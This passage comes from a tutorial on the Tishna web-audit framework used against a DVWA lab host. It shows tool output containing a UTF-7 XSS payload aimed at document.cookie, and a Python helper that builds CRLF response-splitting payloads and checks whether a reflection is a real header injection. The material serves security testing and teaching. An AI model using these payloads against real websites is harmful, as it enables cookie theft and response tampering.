 [!] Enter URL: http://10.10.0.50/dvwa/vulnerabilities/xss_r/

[ + ] Checking HTTP Response Splitting [ + ]
HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 19 Jun 2019 19:13:41 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 498
Content-Type: text/html; charset=iso-8859-1
Client-Date: Fri, 10 May 2020 16:33:29 GMT
Client-Peer: 10.10.0.50:80
Client-Response-Num: 1
Title: 404 Not Found

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /dvwa/vulnerabilities/xss_r/
Content-Type: text/html;charset=UTF-7
Content-Length: 129

+ADw-html+AD4-+ADw-body+AD4-+ADw-script+AD4-alert('XSS,cookies:'+-document.cookie)+ADw-/script+AD4-+ADw-/body+AD4-+ADw-/html+AD4 was not found on this server.</p>
<hr>
<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at 10.10.0.50 Port 80</address>
</body></html>
[ + ] Reflection found, do confirm manually

The module reports a reflection, but look at where it landed: the payload was appended to the path, Apache answered 404, and the injected lines sit inside the error page body with the charset still iso-8859-1. A real split would put Content-Type: text/html;charset=UTF-7 in the header block, and even then current browsers no longer decode UTF-7, so this payload is inert today. Note also that DVWA's reflected XSS is in the name parameter of this page (/vulnerabilities/xss_r/?name=...), which this module never touches; use one of the parameter-based XSS modules or a manual request for that.
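Both the module 12 run and this one reported reflections that were really Apache echoing the path into its 404 body. The following added Python example (not from Tishna or the original article) makes that distinction mechanically: it builds the percent-encoded CRLF payload, splits a raw response into header block and body, reports header-injection only when the injected line lands in the header block, and extracts the declared charset so a UTF-7 payload can be judged. The first sample is the 404 shown above; the second, a response where the split succeeded, is constructed.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import quote

Headers = List[Tuple[str, str]]

MARKER = "Set-Cookie: HTTP_response_splitting=YES"

# Sample 1: the Apache 404 returned above; the injected line is inside the HTML body.
SAMPLE_404 = (
    "HTTP/1.1 404 Not Found\r\n"
    "Server: Apache/2.2.8 (Ubuntu) DAV/2\r\n"
    "Content-Type: text/html; charset=iso-8859-1\r\n"
    "\r\n"
    "<html><head><title>404 Not Found</title></head><body>\n"
    "<p>The requested URL /dvwa/\n"
    "Set-Cookie: HTTP_response_splitting=YES\n"
    "Foo: bar was not found on this server.</p>\n"
    "</body></html>\n"
)

# Sample 2 (constructed): a redirect that copied the path into Location
# unescaped, so our CRLF ended that header and the injected lines followed.
SAMPLE_SPLIT = (
    "HTTP/1.1 302 Found\r\n"
    "Location: http://10.10.0.50/dvwa/\r\n"
    "Set-Cookie: HTTP_response_splitting=YES\r\n"
    "Foo: bar\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)


def crlf_payload(path: str, injected_line: str) -> str:
    """Append a percent-encoded CR LF plus the line we want to become a header."""
    return path + quote("\r\n" + injected_line, safe="")


def split_response(raw: str) -> Tuple[str, Headers, str]:
    """Separate status line, header block and body of a raw HTTP response."""
    raw = raw.replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    status_line, *lines = head.split("\n")
    headers: Headers = []
    for line in lines:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return status_line, headers, body


def charset_of(headers: Headers) -> Optional[str]:
    """Return the charset the server declared in Content-Type, or None."""
    for name, value in headers:
        if name.lower() == "content-type":
            m = re.search(r"charset=([\w-]+)", value, re.I)
            return m.group(1).lower() if m else None
    return None


def classify_reflection(raw: str, marker: str) -> str:
    """header-injection: the marker became a real header (splitting works).
    body-reflection-only: the marker is only echoed in the body (Apache's 404).
    none: not reflected at all."""
    _, headers, body = split_response(raw)
    if any(marker in f"{name}: {value}" for name, value in headers):
        return "header-injection"
    if marker in body:
        return "body-reflection-only"
    return "none"


if __name__ == "__main__":
    print(crlf_payload("/dvwa/", MARKER))
    for label, raw in (("apache 404", SAMPLE_404), ("split", SAMPLE_SPLIT)):
        print(label, classify_reflection(raw, MARKER), charset_of(split_response(raw)[1]))
```

Feed `classify_reflection` the raw response from your own request (a raw socket or curl with `-i`, not a parsed client that would silently merge the headers) and only a `header-injection` result is a splitting finding; for the UTF-7 XSS variant, additionally require `charset_of` to return `utf-7`.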

There are a lot of modules available in Tishna, but be aware that not all of them work correctly, and that its "reflection found" results are prompts to verify by hand rather than confirmed vulnerabilities. The project was being actively developed at the time of writing, so even though it's not perfect it is still useful and may well improve.

Wrapping Up

In this tutorial, we learned how to use a pentesting framework called Tishna to audit and enumerate a vulnerable web app. First, we set up the tool and installed it on our system. Then, we explored some of the modules it contains, such as those used to gather HTTP header information, extract images and URLs, and test for vulnerabilities such as XSS and Shellshock. Tishna is a handy tool that can automate some of the processes involved in auditing web applications and servers.

Cover image by Kvistholt Photography/Unsplash; Screenshots by drd_/Null Byte
